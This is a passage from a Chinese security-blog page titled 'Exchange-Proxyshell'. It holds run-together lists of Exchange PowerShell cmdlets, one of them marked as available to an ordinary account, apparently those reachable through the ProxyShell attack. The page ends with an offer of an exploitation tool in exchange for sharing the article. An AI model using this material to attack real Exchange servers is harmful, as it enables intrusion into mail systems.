top-MigrationBatchStop-UMPhoneSessionSuspend-MailboxDatabaseCopySuspend-MailboxRestoreRequestSuspend-MessageSuspend-MoveRequestSuspend-MRSRequestSuspend-PublicFolderMailboxMigrationRequestSuspend-PublicFolderMigrationRequestSuspend-PublicFolderMoveRequestSuspend-QueueTest-ActiveSyncConnectivityTest-ArchiveConnectivityTest-AssistantHealthTest-CalendarConnectivityTest-DataClassificationTest-EcpConnectivityTest-EdgeSynchronizationTest-ExchangeSearchTest-FederationTrustTest-FederationTrustCertificateTest-ImapConnectivityTest-IPAllowListProviderTest-IPBlockListProviderTest-IRMConfigurationTest-MailflowTest-MAPIConnectivityTest-MigrationServerAvailabilityTest-MLBHealthTest-MRSHealthTest-OAuthConnectivityTest-OrganizationRelationshipTest-OutlookConnectivityTest-OutlookWebServicesTest-PopConnectivityTest-PowerShellConnectivityTest-ReplicationHealthTest-SafeAndBlockedHashesTest-SenderIdTest-ServiceHealthTest-SiteMailboxTest-SmtpConnectivityTest-TextExtractionTest-UMConnectivityTest-WebServicesConnectivityUninstall-TransportAgentUpdate-AddressListUpdate-DatabaseSchemaUpdate-DistributionGroupMemberUpdate-EmailAddressPolicyUpdate-ExchangeHelpUpdate-GlobalAddressListUpdate-HybridConfigurationUpdate-MailboxDatabaseCopyUpdate-OfflineAddressBookUpdate-PublicFolderMailboxUpdate-RecipientUpdate-RoleGroupMemberUpdate-SafeListUpdate-SiteMailboxUpdate-StoreMailboxStateWrite-AdminAuditLogExit-PSSessionGet-FormatDataMeasure-ObjectOut-DefaultSelect-Object

12

普通账户

Add-DistributionGroupMemberAdd-MailboxFolderPermissionClear-ActiveSyncDeviceClear-MobileDeviceClear-TextMessagingAccountCompare-TextMessagingVerificationCodeDisable-AppDisable-InboxRuleDisable-SweepRuleDisable-UMCallAnsweringRuleEnable-AppEnable-InboxRuleEnable-SweepRuleEnable-UMCallAnsweringRuleGet-ActiveSyncDeviceGet-ActiveSyncDeviceStatisticsGet-AppGet-CalendarNotificationGet-CalendarProcessingGet-CASMailboxGet-CommandGet-ConsumerGroupGet-ConsumerMailboxGet-DistributionGroupGet-DistributionGroupMemberGet-EligibleDistributionGroupForMigrationGet-GroupGet-HelpGet-InboxRuleGet-MailboxGet-MailboxAutoReplyConfigurationGet-MailboxCalendarConfigurationGet-MailboxCalendarFolderGet-MailboxFolderGet-MailboxFolderPermissionGet-MailboxJunkEmailConfigurationGet-MailboxMessageConfigurationGet-MailboxPreferredLocationGet-MailboxRegionalConfigurationGet-MailboxSpellingConfigurationGet-MailboxStatisticsGet-MailboxUserConfigurationGet-MessageCategoryGet-MessageClassificationGet-MessageTrackingReportGet-MobileDeviceGet-MobileDeviceStatisticsGet-OnlineMeetingConfigurationGet-RbacDiagnosticInfoGet-RecipientGet-SiteMailboxGet-SiteMailboxDiagnosticsGet-SweepRuleGet-TextMessagingAccountGet-UMCallAnsweringRuleGet-UMMailboxGet-UMMailboxConfigurationGet-UMPhoneSessionGet-UnifiedAuditSettingGet-UserGet-UserPhotoImport-RecipientDataPropertyNew-AppNew-ConsumerGroupNew-InboxRuleNew-MailboxFolderNew-MailMessageNew-SchedulingMailboxNew-SiteMailboxNew-SweepRuleNew-UMCallAnsweringRuleRemove-ActiveSyncDeviceRemove-AppRemove-DistributionGroupMemberRemove-InboxRuleRemove-MailboxFolderPermissionRemove-MailboxUserConfigurationRemove-MobileDeviceRemove-SweepRuleRemove-UMCallAnsweringRuleRemove-UserPhotoSearch-MessageTrackingReportSend-TextMessagingVerificationCodeSet-CalendarNotificationSet-CalendarProcessingSet-CASMailboxSet-ConsumerGroupSet-ConsumerMailboxSet-InboxRuleSet-MailboxSet-MailboxAutoReplyConfigurationSet-MailboxCalendarConfigurationSet-MailboxCalendarFolderSet-MailboxFolderPermissionSet-MailboxJunkEmailConfigurationSet-MailboxMessageConfigurationSet-MailboxRegionalConfigurationSet-MailboxSpellingConfigurationSet-MailUserSet-SiteMailboxSet-SweepRuleSet-TextMessagingAccountSet-UMCallAnsweringRuleSet-UMMailboxSet-UMMailboxConfigurationSet-UMMailboxPINSet-UnifiedAuditSettingSet-UserSet-UserPhotoStart-AuditAssistantStart-UMPhoneSessionStop-UMPhoneSessionTest-SiteMailboxUpdate-SiteMailboxExit-PSSessionGet-FormatDataMeasure-ObjectOut-DefaultSelect-Object

13

工具获取

  1. 转发本文至朋友圈

  2. 回复edi@exchange 获取



知识来源: https://mp.weixin.qq.com/s?__biz=MzIzMTQ4NzE2Ng==&mid=2247488675&idx=1&sn=245ed77a14d0e481b861ad9f4c237902

阅读:36269 | 评论:0 | 标签:shell

想收藏或者和大家分享这篇好文章→复制链接地址

“Exchange-Proxyshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云